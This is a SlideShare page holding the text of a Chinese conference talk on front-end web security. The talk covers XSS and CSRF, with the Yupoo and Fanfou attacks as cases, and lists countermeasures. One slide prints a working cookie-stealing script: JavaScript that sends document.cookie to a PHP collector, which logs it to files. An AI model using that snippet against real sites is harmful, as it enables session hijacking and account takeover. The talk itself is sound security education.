Enviar búsqueda
Cargar
安全那些事儿
•
11 recomendaciones
•
798 vistas
明
明 城
Seguir
Tecnología
Denunciar
Compartir
Denunciar
Compartir
1 de 42
Descargar ahora
Descargar para leer sin conexión
Recomendados
2007 第十屆畢業特輯 (下)
2007 第十屆畢業特輯 (下)
lysmama
最健康食物排行榜
最健康食物排行榜
hoa99999
CHN-008-國貿相關考證照資訊
CHN-008-國貿相關考證照資訊
handbook
校長和新生家長的約會 註冊會(June)08 09 V2
校長和新生家長的約會 註冊會(June)08 09 V2
lysmama
2007 第十屆畢業特輯 (上)
2007 第十屆畢業特輯 (上)
lysmama
動物音樂會特刋
動物音樂會特刋
lysmama
61第四課成語造句練習
61第四課成語造句練習
tenshain
校長和新生家長的約會 註冊會(June)08 09
校長和新生家長的約會 註冊會(June)08 09
lysmama
Recomendados
2007 第十屆畢業特輯 (下)
2007 第十屆畢業特輯 (下)
lysmama
最健康食物排行榜
最健康食物排行榜
hoa99999
CHN-008-國貿相關考證照資訊
CHN-008-國貿相關考證照資訊
handbook
校長和新生家長的約會 註冊會(June)08 09 V2
校長和新生家長的約會 註冊會(June)08 09 V2
lysmama
2007 第十屆畢業特輯 (上)
2007 第十屆畢業特輯 (上)
lysmama
動物音樂會特刋
動物音樂會特刋
lysmama
61第四課成語造句練習
61第四課成語造句練習
tenshain
校長和新生家長的約會 註冊會(June)08 09
校長和新生家長的約會 註冊會(June)08 09
lysmama
07-08 高班奧運小書
07-08 高班奧運小書
lysmama
YANAYOGA SYSTEM POINT
YANAYOGA SYSTEM POINT
eean
CHN-010-國際物流概論
CHN-010-國際物流概論
handbook
HR-087-設計有效率的組織
HR-087-設計有效率的組織
handbook
香港六合彩-六合彩
香港六合彩-六合彩
pbbojfi
HR-102-職業適性診斷測驗1
HR-102-職業適性診斷測驗1
handbook
HR-082-個人優勢與職場發展
HR-082-個人優勢與職場發展
handbook
DS-021-機器人機構設計Ok
DS-021-機器人機構設計Ok
handbook
HR-090-網路自學與傳統自學比較
HR-090-網路自學與傳統自學比較
handbook
Single
Single
guest1c04b2
Peopo報告 阿哲老師
Peopo報告 阿哲老師
科幻嘴泡
HR-084-從藍海策略談技職學生的生涯規劃
HR-084-從藍海策略談技職學生的生涯規劃
handbook
毛毛蟲的天空pdf
毛毛蟲的天空pdf
Carol541106
K2中文
K2中文
lysmama
盛振中:搜寻非常道
盛振中:搜寻非常道
aaronsheng
香港六合彩
香港六合彩
香港六合彩 香港六合彩
Pcb Factory
Pcb Factory
Michael Hanson
HR-104-公務員核心價值及核心能力
HR-104-公務員核心價值及核心能力
handbook
班級套書學習單 不是我的錯
班級套書學習單 不是我的錯
amywen
北投公園規劃設計案
北投公園規劃設計案
台北市議員黃向群
Más contenido relacionado
La actualidad más candente
07-08 高班奧運小書
07-08 高班奧運小書
lysmama
YANAYOGA SYSTEM POINT
YANAYOGA SYSTEM POINT
eean
CHN-010-國際物流概論
CHN-010-國際物流概論
handbook
HR-087-設計有效率的組織
HR-087-設計有效率的組織
handbook
香港六合彩-六合彩
香港六合彩-六合彩
pbbojfi
HR-102-職業適性診斷測驗1
HR-102-職業適性診斷測驗1
handbook
HR-082-個人優勢與職場發展
HR-082-個人優勢與職場發展
handbook
DS-021-機器人機構設計Ok
DS-021-機器人機構設計Ok
handbook
HR-090-網路自學與傳統自學比較
HR-090-網路自學與傳統自學比較
handbook
Single
Single
guest1c04b2
Peopo報告 阿哲老師
Peopo報告 阿哲老師
科幻嘴泡
HR-084-從藍海策略談技職學生的生涯規劃
HR-084-從藍海策略談技職學生的生涯規劃
handbook
毛毛蟲的天空pdf
毛毛蟲的天空pdf
Carol541106
K2中文
K2中文
lysmama
盛振中:搜寻非常道
盛振中:搜寻非常道
aaronsheng
香港六合彩
香港六合彩
香港六合彩 香港六合彩
Pcb Factory
Pcb Factory
Michael Hanson
HR-104-公務員核心價值及核心能力
HR-104-公務員核心價值及核心能力
handbook
班級套書學習單 不是我的錯
班級套書學習單 不是我的錯
amywen
北投公園規劃設計案
北投公園規劃設計案
台北市議員黃向群
La actualidad más candente
(20)
07-08 高班奧運小書
07-08 高班奧運小書
YANAYOGA SYSTEM POINT
YANAYOGA SYSTEM POINT
CHN-010-國際物流概論
CHN-010-國際物流概論
HR-087-設計有效率的組織
HR-087-設計有效率的組織
香港六合彩-六合彩
香港六合彩-六合彩
HR-102-職業適性診斷測驗1
HR-102-職業適性診斷測驗1
HR-082-個人優勢與職場發展
HR-082-個人優勢與職場發展
DS-021-機器人機構設計Ok
DS-021-機器人機構設計Ok
HR-090-網路自學與傳統自學比較
HR-090-網路自學與傳統自學比較
Single
Single
Peopo報告 阿哲老師
Peopo報告 阿哲老師
HR-084-從藍海策略談技職學生的生涯規劃
HR-084-從藍海策略談技職學生的生涯規劃
毛毛蟲的天空pdf
毛毛蟲的天空pdf
K2中文
K2中文
盛振中:搜寻非常道
盛振中:搜寻非常道
香港六合彩
香港六合彩
Pcb Factory
Pcb Factory
HR-104-公務員核心價值及核心能力
HR-104-公務員核心價值及核心能力
班級套書學習單 不是我的錯
班級套書學習單 不是我的錯
北投公園規劃設計案
北投公園規劃設計案
安全那些事儿
1.
安全那些事儿
明城
2.
说些猥琐的话题
3.
严肃点…
4.
“ 水手们,安全不是件搞笑的事情”
5.
“ 安全第一,文明操作”
6.
国内互联网上约有 1/20000 的页面被感染
7.
浏览器的漏洞使得应用如履薄冰
8.
前端,是数据流的引入者
9.
所以…
10.
前端代码同样可以产生安全问题 前端同样需要关注安全
11.
“ 抓稳,咱启航了!”
12.
常见前端攻击方式
13.
我们的航海图
14.
XSS , Web
攻击之源
15.
XSS 不像 CSS
那么优美 跨站脚本攻击( Cross-site scripting ,通常简称为 XSS )是 一种网站应用程式的安全漏洞攻击,允许恶意使用者将程式码 注入到网页上,其他使用者在观看网页时就会受到影响。
16.
典型的 XSS 注入
17.
XSS 的危害 •盗取用户 Cookie •修改页面
DOM •作为其他攻击的跳板 •…
18.
攻击案例 Yupoo 的
XSS 漏洞
19.
攻击原理 用 Yupoo 某处的
XSS 漏洞盗取用户 Cookie 信 息,然后伪造 Cookie 模拟登陆。
20.
船长,发现 XSS 漏洞! 不要小看
alert ,这表明你已经拥有了对这页面的控制权 !
21.
构建“传说中的”攻击脚本 客户端( Javascript
) var img = new Image(); img.src = 'get_cookie.php?var='+encodeURI(document.cookie); 服务器端( PHP ) <?php if (isset($_GET['var'])) { file_put_contents('./cookie/'.time().'.txt', urldecode($_GET['var'])); }
22.
“ 不是技术问题”的技术问题 事情到这步, 就不仅要看人品,更要看相貌了!
23.
广告过后,马上回来…
24.
船长,“鱼”上钩了! 于是乎,通过这个 XSS 漏洞,我们就获 取到了这家伙的
Cookie 。
25.
接下来的情节,少儿不宜
26.
那么,如何防范 XSS •Filter input,Escape
output (过滤输入,转义输出) •严格控制 Cookie 域 •禁用客户端脚本
27.
XSS 相关的参考资源 •http://en.wikipedia.org/wiki/Cross-site_scripting •http://www.gracecode.com/Archive/Display/2517 •http://www.gracecode.com/Archive/Display/2491 •http://ha.ckers.org/xss.html •http://www.xssed.com/
28.
咳咳,休息一下…
29.
CSRF ,苏醒的巨人
30.
学术化的定义 CSRF ( Cross
Site Request Forgery )是伪造 客户端请求的一种攻击,字面上的意思是跨站 点伪造请求。
31.
CSRF 的危害 借用被攻击者在目标站点上的权限,进 行不被期望的操作。
32.
攻击案例 饭否的 CSRF 蠕虫攻击
Knownsec Team http://www.knownsec.com
33.
饭否的 CSRF 蠕虫攻击 原理:通过第三方页面
POST 私信给好友, 继而递归的传播。
34.
看片来得凶猛些…
35.
那么,如何防范 CSRF •正确使用 GET
、 POST 和 Cookie •使用 Referer 判断请求来源 •在请求中使用 Security token •妈妈说了,不要打开陌生的链接
36.
CSRF 相关的参考资源 •http://en.wikipedia.org/wiki/Cross-site_request_forgery •http://www.cgisecurity.com/csrf-faq.html •http://www.80sec.com/csrf-securit.html •http://www.playhack.net/view.php?id=31
37.
其他攻击方式
38.
Clickjacking
39.
蠕虫和钓鱼
40.
冥思
41.
“ 噢,船长,我的船长!”
42.
'alert(/tHx/)'.replace(/.+/, eval);
Descargar ahora